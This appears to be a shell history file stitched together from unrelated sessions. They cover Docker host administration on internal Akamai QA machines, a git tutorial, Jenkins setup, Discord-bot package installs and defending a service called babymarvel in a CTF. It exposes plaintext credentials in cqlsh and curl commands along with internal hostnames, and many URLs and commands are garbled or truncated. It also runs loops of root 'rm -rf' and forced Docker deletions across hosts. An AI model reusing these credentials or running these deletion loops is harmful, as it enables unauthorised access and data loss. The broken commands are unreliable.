~/tomcat8-2.4-release.tar root@HOST:/tmp +echo -n $_HOSTS | parallel -j 5 -I HOST rsync -arv -e gwsh --stats --progress --human-readable {} ~/tomcat8-2.4-release.tar root@HOST:/tmp +echo -n $_HOSTS | parallel -vv --gnu -j 5 -d " " -I HOST "rsync -crlvz -e 'gwsh' --stats --progress tomcat8-2.4-release.tar root@HOST:/tmp" + +clear +gwsh root@sqainfra-docker03.sqaextranet.akamai.com +gwsh root@sqainfra-docker04.sqaextranet.akamai.com +gwsh p4-docker01.extranet.akamai.com +gwsh root@sqa-docker04.sqaextranet.akamai.com +gwsh root@sqa-docker20.sqaextranet.akamai.com +./healthchecks.py +./healthchecks.py sqashared +gwsh root@sqa-docker01.sqaextranet.akamai.com +gwsh root@sqa-docker05.sqaextranet.akamai.com +gwsh root@sqa-docker08.sqaextranet.akamai.com +gwsh root@sqa-docker10.sqaextranet.akamai.com +gwsh root@sqa-docker12.sqaextranet.akamai.com +gwsh root@sqa-docker14.sqaextranet.akamai.com +gwsh root@sqa-docker20.sqaextranet.akamai.com +gwsh root@sqa-docker21.sqaextranet.akamai.com +gwsh root@sqa-docker22.sqaextranet.akamai.com +gwsh root@sqa-docker23.sqaextranet.akamai.com +ping agg-internal.sqa2.qa.akamai.com +telnet agg-internal.sqa2.qa.akamai.com 22 +ssh root@agg-internal.sqa2.qa.akamai.com +vbe +clear +gwsh root@sqainfra-docker03.sqaextranet.akamai.com +for i in {01..05}; do echo "Hello $i!"; done +for i in {01..05}; echo "sqainfra-docker$i.sqaextranet.akamai.com"; done +for i in {01..05}; echo sqainfra-docker$i.sqaextranet.akamai.com; done +for i in {01..05}; do echo "sqainfra-docker$i.sqaextranet.akamai.com"; done +for i in {01..05}; do gwsh "sqainfra-docker$i.sqaextranet.akamai.com 'cat /a/etc/install.conf'"; done +for i in {01..05}; do gwsh sqainfra-docker$i.sqaextranet.akamai.com 'cat /a/etc/install.conf'; done +for i in {01..05}; do hpst=sqainfra-docker$i.sqaextranet.akamai.com; echo "Machine: $host"; gwsh $host 'cat /a/etc/install.conf'; done +for i in {01..05}; do host=sqainfra-docker$i.sqaextranet.akamai.com; echo "Machine: $host"; gwsh $host 'cat /a/etc/install.conf'; done +clear +for i in {01..05}; do host=sqainfra-docker$i.sqaextranet.akamai.com; echo "Machine: $host"; gwsh $host 'cat /a/etc/install.conf'; echo ""; done +clear +for i in {01..05}; do host=sqainfra-docker$i.sqaextranet.akamai.com; echo "Machine: $host"; gwsh $host 'docker rm -f $(docker ps -a -q -f status=exited)'; echo ""; done +for i in {01..05}; do host=sqainfra-docker$i.sqaextranet.akamai.com; echo "Machine: $host"; gwsh root@$host 'docker rm -f $(docker ps -a -q -f status=exited)'; echo ""; done +for i in {01..05}; do host=sqainfra-docker$i.sqaextranet.akamai.com; echo "Machine: $host"; gwsh root@$host 'docker rmi -f $(docker images -a -q)'; echo ""; done +gwsh root@sqainfra-docker01.sqaextranet.akamai.com +for i in {01..05}; do host=sqainfra-docker$i.sqaextranet.akamai.com; echo "Machine: $host"; gwsh root@$host 'docker rm -f $(docker ps -a -q -f status=exited)'; echo ""; done +gwsh root@sqainfra-docker01.sqaextranet.akamai.com +for i in {01..05}; do host=sqainfra-docker$i.sqaextranet.akamai.com; echo "Machine: $host"; gwsh root@$host 'docker rm -f $(docker ps -a -q)'; echo ""; done +for i in {01..05}; do host=sqainfra-docker$i.sqaextranet.akamai.com; echo "Machine: $host"; gwsh root@$host 'docker rmi -f $(docker images -a -q)'; echo ""; done +pps +ppsh +sudo apt-get install ppsh +parallel +sudo apt-get install parallel +clear +docker images +docker rmi f1 +docker fmio 8d +docker rmi 8d9 +clear +docker images +docker rmi -f 465 +clear +docker images +docker rmi $(docker images -a -q) +docker pull pdr.akamai.com/library/tomcat8:platform-2.4-RELEASE +docker images +docker history 64 +docker inspect 64 +clear +docker inspect 64 +clear +docker images +_HOSTS="sqainfra-docker01.sqaextranet.akamai.com sqainfra-docker02.sqaextranet.akamai.com sqainfra-docker03.sqaextranet.akamai.com sqainfra-docker04.sqaextranet.akamai.com sqainfra-docker05.sqaextranet.akamai.com" +echo -n $_HOSTS | parallel -vv --gnu -j +3 -d " " -I HOST "echo HOST" +man parallel +for i in {01..05}; do host=sqainfra-docker$i.sqaextranet.akamai.com; echo "Machine: $host"; gwsh root@$host 'docker rmi -f $(docker images -a -q)'; echo ""; done +for i in {01..05}; do host=sqainfra-docker$i.sqaextranet.akamai.com; echo "Machine: $host"; gwsh root@$host 'rm -rf /tmp/tomcat-*'; echo ""; done +gwsh root@sqainfra-docker01.sqaextranet.akamai.com + +gwsh root@sqainfra-docker03.sqaextranet.akamai.com 'rm -rf /tmp/tomcat8-2.4-release.tar' +gwsh root@sqainfra-docker04.sqaextranet.akamai.com 'rm -rf /tmp/tomcat8-2.4-release.tar' +gwsh root@sqainfra-docker05.sqaextranet.akamai.com 'rm -rf /tmp/tomcat8-2.4-release.tar' +gwsh root@sqainfra-docker05.sqaextranet.akamai.com +gwsh root@sqainfra-docker01.sqaextranet.akamai.com +gwsh root@sqainfra-docker02.sqaextranet.akamai.com +for i in {01..05}; do host=sqainfra-docker$i.sqaextranet.akamai.com; echo "Machine: $host"; gwsh root@$host 'docker load < /tmp/tomcat8-2.4-release.tar'; echo ""; done +for i in {01..05}; do host=sqainfra-docker$i.sqaextranet.akamai.com; echo "Machine: $host"; gwsh root@$host 'docker rmi -f $(docker images -a -q)'; echo ""; done +gwsh root@sqainfra-docker02.sqaextranet.akamai.com +gwsh root@sqa-docker36.sqaextranet.akamai.com +gwsh root@sqa-docker21.sqaextranet.akamai.com +ssh root@ +ssh root@ +docker ps +cat /aein +ssh root@ +ssh root@ +ssh root@docker01.pulsar.qa.akamai.com +ssh root@docker02.pulsar.qa.akamai.com +ssh root@docker03.pulsar.qa.akamai.com +ksqa2.qa.akamai.com "SELECT + +export SSL_CERTFILE=/home/pdommeti/akamai-git/dashboard_secrets/conf/sqa-portal-cdb_cert_chain.crt && cqlsh --cqlversion=3.2.1 -u pulsar_dashboard -p sqa7482pulsar_dashboard --ssl sqa-portal-cdb.akamai.com +curl -vk -u akatec:ec}T9E~GxZsar-dashboard.akamai.com:8443/api/v1/se/deployments?environment=qa&isDeploy=true +curl -sk -u akatec:ec}T9E~GxZsar-dashboard.akamai.com:8443/api/v1/se/deployments?environment=qa&isDeploy=true | jq . +clear +curl -sk -u akatec:ec}T9E~GxZsar-dashboard.akamai.com:8443/api/v1/se/deployments?environment=qa&isDeploy=true | jq . +clear +curl -sk -u akatec:ec}T9E~GxZsar-dashboard.akamai.com:8443/api/v1/se/deployments?environment=qa&isDeploy=true +clear +curl -s -u akatec:ec}T9E~GxZsar-dashboard.akamai.com:8443/api/v1/se/deployments?environment=qa&isDeploy=true +clear +qa-apps.json +vimqa-apps.json +vim qa-apps.json +cat qa-apps.json | jq . +cat qa-apps.json | jq .[].dockerImage +cat qa-apps.json | jq . +cat qa-apps.json | jq .[].deployed +cat qa-apps.json | jq .[].dockerImage +cat qa-apps.json | jq .[].dockerImage | grep -v null +clear +cat qa-apps.json | jq .[].dockerImage | grep -v null +cat qa-apps.json | jq .[].dockerImage | grep -v null | wc -kl +cat qa-apps.json | jq .[].dockerImage | grep -v null | wc -l +sudo vim /etc/default/docker +mkdir dockerimagestore +sudo service restart docker +sudo service docker restart +docker images +sudo su - +clear +docker pull pdr.akamai.com/library/tomcat8:platform-2.4-RELEASE +clear +sudo vim /etc/default/docker +sudo service docker restart +docker pull pdr.akamai.com/library/tomcat8:platform-2.4-RELEASE +ls -lrt +sudo su - +chown pdommeti:staff ../imagestore-docker/ +chown -R pdommeti:staff ../imagestore-docker/ +chown -R pdommeti:staff ../imagestore-docker +chown -R pdommeti:staff imagestore-docker +sudo chown -R pdommeti:staff imagestore-docker +ls -lrt +clear +tree +clear +whereis tree +ldd tree +rsync arve gwsh root@sqainfra-docker01.sqaextranet.akamai.com:/tmp +rsync arve gwsh tree root@sqainfra-docker01.sqaextranet.akamai.com:/tmp +sudo rsync arve gwsh tree root@sqainfra-docker01.sqaextranet.akamai.com:/tmp +cp tree /tmp/ +chown pdommeti:staff tree +rsync arve gwsh tree root@sqainfra-docker01.sqaextranet.akamai.com:/tmp +ssh-add -l +ls -lrt +rsync arve gwsh tree root@sqainfra-docker01.sqaextranet.akamai.com:/tmp +rsync arve gwsh fileCiGFUM root@sqainfra-docker01.sqaextranet.akamai.com:/tmp +rsync arve gwsh tree root@sqainfra-docker01.sqaextranet.akamai.com:/tmp +vim ~/.ssh/known_hosts +rsync arve gwsh tree root@sqainfra-docker01.sqaextranet.akamai.com:/tmp +ssh-add -l +rsync arve gwsh tree root@sqainfra-docker01.sqaextranet.akamai.com: +rsync -arve gwsh tree root@sqainfra-docker01.sqaextranet.akamai.com:/tmp +ssh lsg-east +clear +ssh root@docker03.pulsar.qa.akamai.com +root@sqainfra-docker03.sqaextranet.akamai.com:/tmp +root@sqainfra-docker03.sqaextranet.akamai.com +docker ps +gwsh root@sqainfra-docker01.sqaextranet.akamai.com +gwsh root@sqainfra-docker05.sqaextranet.akamai.com +xit +history +history | grep parallel +_HOSTS="sqainfra-docker01.sqaextranet.akamai.com sqainfra-docker02.sqaextranet.akamai.com sqainfra-docker03.sqaextranet.akamai.com sqainfra-docker04.sqaextranet.akamai.com sqainfra-docker05.sqaextranet.akamai.com" +echo -n $_HOSTS | parallel -vv --gnu -j 5 -d " " -I HOST "gwsh root@HOST '/a/sbin/akamai_run stickystop docker'" +echo -n $_HOSTS | parallel -vv --gnu -j 5 -d " " -I HOST "gwsh root@HOST 'rm -rf /ghostcache/pulsar-docker-store/images/aufs/distribution'" +echo -n $_HOSTS | parallel -vv --gnu -j 5 -d " " -I HOST "gwsh root@HOST 'rm -rf /ghostcache/pulsar-docker-store/image/aufs/distribution/*'" +echo -n $_HOSTS | parallel -vv --gnu -j 5 -d " " -I HOST "gwsh root@HOST '/a/sbin/akamai_run unstickystop docker'" +echo -n $_HOSTS | parallel -vv --gnu -j 5 -d " " -I HOST "gwsh root@HOST 'docker rm $(docker ps -a -q)'" +echo -n $_HOSTS | parallel -vv --gnu -j 5 -d " " -I HOST "gwsh root@HOST 'docker rmi -f $(docker images -a -q)'" +for i in {01..05}; do host=sqainfra-docker$i.sqaextranet.akamai.com; echo "Machine: $host"; gwsh root@$host 'docker rmi -f $(docker images -a -q)'; echo ""; done +for i in {01..05}; do host=sqainfra-docker$i.sqaextranet.akamai.com; echo "Machine: $host"; gwsh root@$host '/a/sbin/akamai_run stickystop docker'; echo ""; done +docker pull pdr.akamai.com/pulsar/authz/1.14.0.RELEASE +docker pull pdr.akamai.com/pulsar/authz/1.14.0 +docker pull pdr.akamai.com/pulsar/authz/1.14.0.RELEASE +echo -n $_HOSTS | parallel -vv --gnu -j 5 -d " " -I HOST "gwsh root@HOST 'docker rm $(docker ps -a -q)'" +echo -n $_HOSTS | parallel -vv --gnu -j 5 -d " " -I HOST "echo HOST'" +echo -n $_HOSTS | parallel -vv --gnu -j 5 -d " " -I HOST "echo $HOST'" +history | grep HOST +_HOSTS="sqainfra-docker01.sqaextranet.akamai.com sqainfra-docker02.sqaextranet.akamai.com sqainfra-docker03.sqaextranet.akamai.com sqainfra-docker04.sqaextranet.akamai.com sqainfra-docker05.sqaextranet.akamai.com" +echo -n $_HOSTS | parallel -vv --gnu -j 5 -d " " -I HOST "echo $HOST'" +echo -n $_HOSTS | parallel -vv --gnu -j 5 -d " " -I HOST "gwsh root@HOST 'docker rm $(docker ps -a -q)'" +echo -n $_HOSTS | parallel -vv --gnu -j 5 -d " " -I HOST "gwsh root@HOST 'docker rmi $(docker images -a -q)'" +ethtool -g eth0 +_HOSTS="sqainfra-docker01.sqaextranet.akamai.com sqainfra-docker02.sqaextranet.akamai.com sqainfra-docker03.sqaextranet.akamai.com sqainfra-docker04.sqaextranet.akamai.com sqainfra-docker05.sqaextranet.akamai.com" +echo -n $_HOSTS | parallel -vv --gnu -j 5 -d " " -I HOST "gwsh root@HOST 'docker pull pdr.akamai.com/library/tomcat8:platform-2.4-RELEASE'" +clear +kmi-client-check sqa2 -r release-pulsar-9590-2017-04-24-19-35 - +~/Downloads/scripts/keypush.sh --gwsh --cleanold --audit audit.shared.qa.akamai.com +docker ps -a +docker images +clear +gwsh root@sqainfra-docker01.sqaextranet.akamai.com +clear +rm -r sqainfra-mesos01.sqaextranet.akamai.com-apps.json.2017-05-02-15-* + +rm -r sqainfra-mesos01.sqaextranet.akamai.com-apps.json.2017-05-02-15-* +rm -r sqainfra-mesos01.sqaextranet.akamai.com-apps.json.2017-05-02-1* +ls -lrt +gwsh root@sqainfra-mesos01.sqaextranet.akamai.com +rm -r sqainfra-mesos01.sqaextranet.akamai.com-apps.json.2017-05-02-1* +rm -rf sqainfra-mesos01.sqaextranet.akamai.com-apps.json.2017-05-02-1* +ls -lrt +rm -r sqainfra-mesos01.sqaextranet.akamai.com-apps.json.2017-05-02-18-46-55 +clear +ls -lrt +cat sqainfra-mesos01.sqaextranet.akamai.com-apps.json.2017-05-02-18-47-01 +ls -lrt +rm -r sqainfra-mesos01.sqaextranet.akamai.com-apps.json.2017-05-02-18-48-* +ls -lrt +rm -r sqainfra-mesos01.sqaextranet.akamai.com-apps.json.2017-05-02-19-0* +ls -lrt +rm -r sqainfra-mesos01.sqaextranet.akamai.com-apps.json.2017-05-02-18-49-* +clear +ls -lrt +rm -r sqainfra-mesos01.sqaextranet.akamai.com-apps.json.2017-05-02-18-5* +ls -lrt +clear +for i in {01..05}; do host=sqainfra-docker$i.sqaextranet.akamai.com; echo "Machine: $host"; gwsh root@$host '/a/sbin/akamai_run stickystop docker'; echo ""; done +for i in {01..05}; do host=sqainfra-docker$i.sqaextranet.akamai.com; echo "Machine: $host"; gwsh root@$host 'docker rm -f $(docker ps -a -q)'; echo ""; done +for i in {01..05}; do host=sqainfra-docker$i.sqaextranet.akamai.com; echo "Machine: $host"; gwsh root@$host '/a/sbin/akamai_run unstickystop docker'; echo ""; done +for i in {01..05}; do host=sqainfra-docker$i.sqaextranet.akamai.com; echo "Machine: $host"; gwsh root@$host 'docker rm -f $(docker ps -a -q)'; echo ""; done +for i in {01..05}; do host=sqainfra-docker$i.sqaextranet.akamai.com; echo "Machine: $host"; gwsh root@$host 'docker rmi -f $(docker images -a -q)'; echo ""; done +for i in {01..05}; do host=sqainfra-docker$i.sqaextranet.akamai.com; echo "Machine: $host"; gwsh root@$host 'rm -rf /ghostcache/pulsar-docker-store/image/aufs/distribution'; echo "Removed docker cache on $host"; done +mv dockerimagestore/ imagestore-docker +sudo mv dockerimagestore/ imagestore-docker +ls -lrt +clear +ls -lrt +sudo su - +ssh root@ +clear +gwsh root@sqainfra-docker01.sqaextranet.akamai.com +lear +clear +ls -lrt +clear +for i in {01..05}; do host=sqainfra-docker$i.sqaextranet.akamai.com; echo "Machine: $host"; gwsh root@$host 'docker rm -f $(docker ps -a -q)'; echo ""; done +clear +for i in {01..05}; do host=sqainfra-docker$i.sqaextranet.akamai.com; echo "Machine: $host"; gwsh root@$host 'docker rmi -f $(docker images -a -q)'; echo ""; done +for i in {01..05}; do host=sqainfra-docker$i.sqaextranet.akamai.com; echo "Machine: $host"; gwsh root@$host '/a/sbin/akamai_run stickystop docker'; echo ""; done +for i in {01..05}; do host=sqainfra-docker$i.sqaextranet.akamai.com; echo "Machine: $host"; gwsh root@$host 'rm -rf /ghostcache/pulsar-docker-store/*'; echo ""; done +gwsh root@sqainfra-docker02.sqaextranet.akamai.com +for i in {03..05}; do host=sqainfra-docker$i.sqaextranet.akamai.com; echo "Machine: $host"; gwsh root@$host 'rm -rf /ghostcache/pulsar-docker-store/*'; echo ""; done +for i in {01..05}; do host=sqainfra-docker$i.sqaextranet.akamai.com; echo "Machine: $host"; gwsh root@$host '/a/sbin/akamai_run unstickystop docker'; echo ""; done +_HOSTS="sqainfra-docker01.sqaextranet.akamai.com sqainfra-docker02.sqaextranet.akamai.com sqainfra-docker03.sqaextranet.akamai.com sqainfra-docker04.sqaextranet.akamai.com sqainfra-docker05.sqaextranet.akamai.com" +echo -n $_HOSTS | parallel -vv --gnu -j 5 -d " " -I HOST "gwsh root@HOST 'docker pull pdr.akamai.com/library/tomcat8:2.4-RELEASE '" +echo -n $_HOSTS | parallel -vv --gnu -j 5 -d " " -I HOST "gwsh root@HOST 'docker pull pdr.akamai.com/library/tomcat8:platform-2.4-RELEASE'" +gwsh root@sqainfra-docker02.sqaextranet.akamai.com +clear +ssh root@pulsar_dashboard.sqa2.qa.akamai.com + + +ssh root@pdr-qa.akamai.com +clear +./mesos-migrate-dc.py --colddc sqainfra --hotdc sqainfra --dryrun +./mesos-migrate-dc.py --colddc sqainfra --hotdc sqainfra --ratelimit 2 --dryrun +./mesos-migrate-dc.py --colddc sqainfra --hotdc sqainfra --ratelimit 4 --dryrun +ping sqainfra-mesos01.sqaextranet.akamai.com +vim /etc/hosts +sudo vim /etc/hosts +./mesos-migrate-dc.py --colddc sqainfra --hotdc sqainfra --ratelimit 4 --dryrun +vim ~/marathon-creds.conf +./mesos-migrate-dc.py --colddc sqainfra --hotdc sqainfra --ratelimit 4 --dryrun +vim ~/marathon-creds.conf +./mesos-migrate-dc.py --colddc sqainfra --hotdc sqainfra --ratelimit 2 +sudo vim /etc/hosts +./mesos-migrate-dc.py --colddc sqainfra --hotdc sqainfra --ratelimit 2 +./mesos-migrate-dc.py --colddc sqainfra --hotdc sqainfra --ratelimit 2 --dryrun +./mesos-migrate-dc.py --colddc sqainfra --hotdc sqainfra --ratelimit 2 +./mesos-migrate-dc.py --colddc sqainfra --hotdc sqainfra +./mesos-migrate-dc.py --colddc sqainfra --hotdc sqainfra --ratelimit 2 +./mesos-migrate-dc.py --colddc sqainfra --hotdc sqainfra --ratelimit 23 +./mesos-migrate-dc.py --colddc sqainfra --hotdc sqainfra --ratelimit 2 +./mesos-migrate-dc.py --colddc sqainfra --hotdc sqainfra --ratelimit 1 --marathonjson sqainfra-mesos01.sqaextranet.akamai.com-apps.json.2017-05-02-18-47-01 +./mesos-migrate-dc.py --colddc sqainfra --hotdc sqainfra --ratelimit 1 --marathonjson ~/sqainfra-mesos01.sqaextranet.akamai.com-apps.json.2017-05-02-18-47-01 +./mesos-migrate-dc.py --colddc sqainfra --hotdc sqainfra --ratelimit 2 --marathonjson ~/sqainfra-mesos01.sqaextranet.akamai.com-apps.json.2017-05-02-18-47-01 +curl -s -u akatec:ec}T9E~GxZsar-dashboard.akamai.com:8443/api/v1/se/deployments?environment=qa&isDeploy=true | jq +curl -s -u akatec:ec}T9E~GxZsar-dashboard.akamai.com:8443/api/v1/se/deployments?environment=qa&isDeploy=true | jq . +ls -lrt +sudo fdisk -l | grep '^Disk' +clear +ls -lrt +ls -lrt +clear +pwd +df -h +sudo fdisk -l | grep '^Disk' +sudo cat /etc/fstab +sudo vim /etc/fstab +sudo mount -a +clear +ls -lrt +clear +ls -lrt +clear +ls -a +ls -lrt +ls -lrt +ls -lrt +ls -a +vim .dockerfunc +ls -lrt +ls -lrt +./install.sh -help +./install.sh +./install.sh dotfiles +vim install.sh +ls -lrt +make +ls -lrt +vim Makefile +cat Makefile +make install +clear +ls -a ~/ +clear +clear +exit +sudo rebootsudo apt install lolcat +sudo apt install lolcat +sudo apt install fortune-mod +cler +cp /media/hdd/pdommeti/ +clear +ls -lrt +clear +vim ~/.bashrc +clear +java -version +clear +lsb_release -a +sudo apt install software-properties-common +clear +sudo add-apt-repository ppa:linuxuprising/java +sudo apt install oracle-java11-installer +sudo apt install oracle-java8-set-default +sudo add-apt-repository ppa:webupd8team/java +sudo apt install oracle-java8-set-default +sudo apt-get update +sudo apt install oracle-java8-set-default +sudo apt-cache search oracle +sudo apt-get install oracle-java8-installer +clear +java -version +clear +vim ~/.path +ls -lrt +gpg --with-fingerprint perforce.pubkey +cat ~/.gnupg/pubring.kbx +wget -qO -sudo apt-key add - +debstro} release +vim /etc/apt/sources.list.d/perforce.list +sudo vim /etc/apt/sources.list.d/perforce.list +sudo apt-get update +clear +p4 info +clear +ls -lrt +cp /media/hdd/pdommeti/.ssh/* . +ls -lrt +clear +sudo apt-get install git +git config --global user.name "Anantha Dommeti: +git config --global user.name "Anantha Dommeti" +git config --global user.email "pdommeti@akamai.com" +clear +git -version +git --version +clear +sudo snap install intellij-idea-ultimate --classic --edge +sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 931FF8E79F0876134EDDBDCCA87FF9DF48BF1C90 +clear +echo debsitory.spotify.com stable non-free | sudo tee /etc/apt/sources.list.d/spotify.list +sudo apt-get update +sudo apt-get install spotify-client +sudo apt-get remvoe spotify-client +sudo apt-get removespotify-client +sudo apt-get remove spotify-client +clear +sudo apt-get purge spotify-client +sudo snap install spotify +clear +cp -R /media/hdd/pdommeti/.IntelliJIdea2019.1/ ~/ +cp -fR /media/hdd/pdommeti/.IntelliJIdea2019.1/ ~/ +clear +ls -lrt +ls -lrt +vim Makefile +make install +clear +vim ~/.Xdefaults +vim ~/.Xresources +vim ~/.Xdefaults +pwd +is +Is +ls +mkdir tutial +ls +mkdir tutorial +pwd +.. +ls +mkdir tutorial +pwd +pwd +ls +touch tutorial/index.html +nano index.html +less index.html +sleep 10 +sleep 20 +ruby +ls +ls -a +git init +git status +git add index.html +git status +git commit +git status +git log +git status +ls -a +pwd +ls +git init +git status +git status +git add index.html +git status +git commit +git status +g +pwd +ls +,kdir +mkdir +mkdir tutorial +pwd +pwd +ls +touch tutorial/index.html +nano index.html +less index.html +sleep 10 +ruby +ls +pwd +touch tutorial index.html +git init +git status +git add index.html +git status +git commit +git status +git log +git status +git diff +git add . +git status +git commit -m "add git-logo image" +pwd +git status +git log +git remote add originsktkhs/first-git.git +git remote -v +git push origin master +git config -l +pwd +git status +git log +git init +git add . +git status +git commit +git remote add originsktkhs/ysktkhs.github.io.git +git push origin master +git push origin master +git remote -v +git remote add originsktkhs/second-git.git +git init +git status] +git status +git add +git add . +git remote add originsktkhs/second-git.git +git push origin master +git init +git remote add originsktkhs/second-git.git +seq 10 3 90 +seq 90 2 10 +cat * +cat* +ls +ls -l +mkdir home +ls +su +sudo su +su -s +ls +ls -l +ls +cat > hjsd +cat > hjsd kdughfisudghiuf +top-bn1 +top-bn1 +top -bn1 +bni +ls +ls -l +cat ls +cat users +top +top -bn1 +cat -f 2 top -bn1 +cat top -bni > teste +cat top -bni > exercicio +cat exercicio > top -bn1 +top +cat +cut -f 2 top -bn1 +cut -f2 top -bn1 +who +until +null +until who | grep "$1" > devnull; do sleep 10; done +who +vi simnao.sh +./simnao.sh +chmod +x simnao.sh +./simnao.sh +pico simnao.sh +vi simnao.sh +ls +vin simnao.sh +vi simnao.sh +sudo yum update -y +sestatus +sudo setenforce 0 +sudo vi /etc/selinux/config +sestatus +sudo shutdown -r now +sestatus +sudo yum install java -y +java -version +sudo yum install wget +clear +sudo wget -O /etc/yum.repos.d/jenkins.repos.io/redhat-stable/jenkins.repo +sudo rpm --imports.io/redhat-stable/jenkins.io.key +sudo yum install jenkins -y +sudo systemctl status jenkins +sudo systemctl start jenkins +sudo systemctl status jenkins +ps -ef | grep java +netstat -lntp | grep 1310 +sudo netstat -lntp | grep 1310 +iptables -l +iptables -L +sudo iptables -L +sestatus +clear +pwd +ls -lrt +ls -lrt +cat jenkins +sudo cat jenkins +sudo vi jenkins +sudo systemctl status jenkins +sudo systemctl restart jenkins +sudo systemctl status jenkins +pwd +sudo vi /etc/sysconfig/jenkins +sudo systemctl restart jenkins +ps -ef | grep java +sudo systemctl status jenkins +sudo systemctl stop jenkins +sudo systemctl status jenkins +sudo systemctl start jenkins +sudo systemctl status jenkins +ps -ef | grep java +sudo vi /etc/sysconfig/jenkins +sudo systemctl restart jenkins +ps -ef | grep java +sudo systemctl status firewalld +clear +pwd +sudo systemctl status jenkins +pwd +ls -lrt +ls -lrt +ls -lrt +ls -lrt +ls -lrt +cat config.xml +ls -lrt +ls -lrt +ls -lrt +cat metadata.log +pwd +ls -lrt +cat metadata.log +sudo cat metadata.log +pwd +ls -lrt +ls -lrt +cat nodeMonitors.xml +pwd +ls -lrt +ls -lrt +ls -lrt +cat config.xml +pwd +ls -l;rt +pwd +pnpm i discord-economy +pnpm i ffmpeg +pnpm i opusscript +pnpm i discord-anti-spam-tr +pnpm i discord-economy +refresh +pnpm i Jimp +pnpm install --save jimp +pnpm install --save jimp@0.6.0 +pnpm install --save jimp@0.7.0 +pnpm install --save jimp@0.5.0 +pnpm install --save jimp@0.4.0 +pnpm install --save jimp@0.3.0 +pnpm install --save jimp@0.2.0 +pnpm install --save jimp@0.1.0 +pnpm install --save jimp@0.6.4 +sudo -i +netstat -ln +sudo su +ll /opt/ctf/babymarvel/ro +ls -lrt +cat wrapper.sh +cat /proc/cpuinfo +Our psychic sources tell us that babymarvel is currently at /opt/ctf/babymarvel/ro/whoami. You should put babymarvel back in its place by cp /opt/ctf/babymarvel/ro/whoami /opt/ctf/babymarvel/ro/babymarvel. +But check the scoreboard after a few ticks to make sure babymarvel is running! +Be sure to check babymarvel’s permissions ls -la /opt/ctf/babymarvel/ro/babymarvel, to make sure the ctf_babymarvel user can execute it! +Put the baby back in the crib correctly with chown ctf:ctf_babymarvel /opt/ctf/babymarvel/ro/babymarvel. +At this point babymarvel should be found and you should see green lights on the scoreboard after the next few ticks! +What is that you’re saying, your poor babymarvel is getting pwned? Well this is a CTF, what did you expect? +#/etc/xinetd.d/babymarvel +cat /etc/xinetd.d/babymarvel +cat /opt/ctf/babymarvel/ro/wrapper.sh +../ro/babymarvel +ll +.. src/ +ll +cat Makefile +pwd +pushd ~/ +ll +pwd +ll +mkdir babymarv_orig +cp -a /opt/ctf/babymarvel/ . +cp -a /opt/ctf/babymarvel/ babymarv_orig/ +ll +ll +ll append/ +ll +ll +hostname +hostname -a +file whoami +strace ./whoami +ls -lrt +ll ,, +ls -lrt +ls -lrt src/ +file x0 +ll +cat wrapper.sh +file ../ro/babymarvel +ls -l +ls -l ../ +ls -l ../ro/ +ll +pwd +ls +vi lobby.c +ls +vi users.c +ls +vi utils.c +ls +vi lobby.h +vi Makefile +ls +vi lobby.c +make +vi lobby.c +make +exit +exit +ping +pwd +ll +ll +ll +ll +ll +cat lobby.c +ll +ll +cp -a babymarvel/ro/src/ . +ll +cat Makefile +make +ls -lrt +cat /opt/ctf/babymarvel/ro/wrapper.sh +./babymarvel +ll +vim program.c +vim lobby.c +pwd +ls -lrt +date +ps ax +pwd +make +./babymarvel +pwd +ls -lrt +cp /opt/ctf/babymarvel/ro/whoami /opt/ctf/babymarvel/ro/babymarvel +/opt/ctf/babymarvel/ro/babymarvel +ls -lrt +vi lobby.c +ll /opt/ctf/babymarvel/ro/babymarve +ll /opt/ctf/babymarvel/ro/babymarvel +chown ctf.ctf_babymarvel /opt/ctf/babymarvel/ro/babymarvel +ll /opt/ctf/babymarvel/ro/babymarvel +ll /opt/ctf/babymarvel/ro +/opt/ctf/babymarvel/ro/wrapper.sh +cp babymarvel /opt/ctf/babymarvel/ro/babymarvel +service xinetd restart +sudo service xinetd restart +su +ps ax | grep xinet +cat /opt/ctf/babymarvel/ro/wrapper.sh +netstat -ln +ps ax +cp cp /opt/ctf/babymarvel/ro/whoami /opt/ctf/babymarvel/ro/babymarvel . +cp /opt/ctf/babymarvel/ro/whoami /opt/ctf/babymarvel/ro/babymarvel . +cp -r /opt/ctf/babymarvel/ro/whoami /opt/ctf/babymarvel/ro/ . +ls +ls +ls +vi lobby.c +screen -X +screen +sudo xinetd +cat /etc/services +xinetd +ps ax | grep xinet +ps ax +cat /etc/xinetd.d/babymarvel +/etc/xinetd.d/babymarvel +ll /etc/xinetd.d/babymarvel +pip install swpag_client +pwd +ll +ll +ll ../babymarvel/ +ll ../babymarvel/ro/src/ +pwd +ps ax +ll ../babymarvel/ro/src/ +pwd +ll +pwd +ll +ll babymarvel/ro/src/ +cat /opt/ctf/babymarvel/ +cat /opt/ctf/babymarvel/ro/wrapper.sh +cat /etc/xinetd.d/babymarvel +pwd +ll +ll +ll +pwd +c +ll +ll +ll +ll +ls -lrt +./babymarvel +ls -lrt +diff lobby.c ~/babymarv_orig/src/lobby.c +diff -u lobby.c ~/babymarv_orig/src/lobby.c +#diff -u lobby.c ~/babymarv_orig/src/lobby.c +ll +cp lobby.c lobby.c.orig +cp /opt/ctf/babymarvel/ro/src/lobby.c lobby.c +make +cp babymarvel /opt/ctf/babymarvel/ro/babymarvel +ps ax +/etc/xinetd.d/ +ll /etc/xinetd.d/ +ll /etc/xinetd.d/babymarvel +/etc/xinetd.d/babymarvel +/opt/ctf/babymarvel/ro/babymarvel +netstat -ln +ll +file whoami +ll ro/ +l +ll src/ +ll +#rm -rf babymarvel/ +ll +rm -rf babymarvel/ +ll +ll +ll ro/ +ls -lrt +ll +ll +vim lobby. +vim lobby.. +vim lobby.c +ps ax +nohup /opt/ctf/babymarvel/ro/babymarvel & +cat nohup.out +/opt/ctf/babymarvel/ro/babymarvel +cat /etc/xinetd.d/ +cat /etc/xinetd.d/babymarvel +/opt/ctf/babymarvel/ro/wrapper.sh +ifconfig +ping +#vi ping-all.sh +ll +vim program.c +#vim pastes.c +ll +ll ~/ +l +ll +nc -h +nc -h localhost:20001 +nc localhost 20001 +ll +ll +cp program.c program2.c +vi program2.c +cat program2.c +vi Makefile +#make babymarvel2 +ll +vi Makefile +make babymarvel2 +vi babymarvel2 +vi program.c +make babymarvel +vim Makefile +make +vi program.c +ls -lrt +male +make +vi Makefile +make +cp Makefile Makefile.bak +vi Makefile +make +cp babymarvel /opt/ctf/babymarvel/ro/babymarvel +ps ax +cp babymarvel /opt/ctf/babymarvel/ro/babymarvel +vim 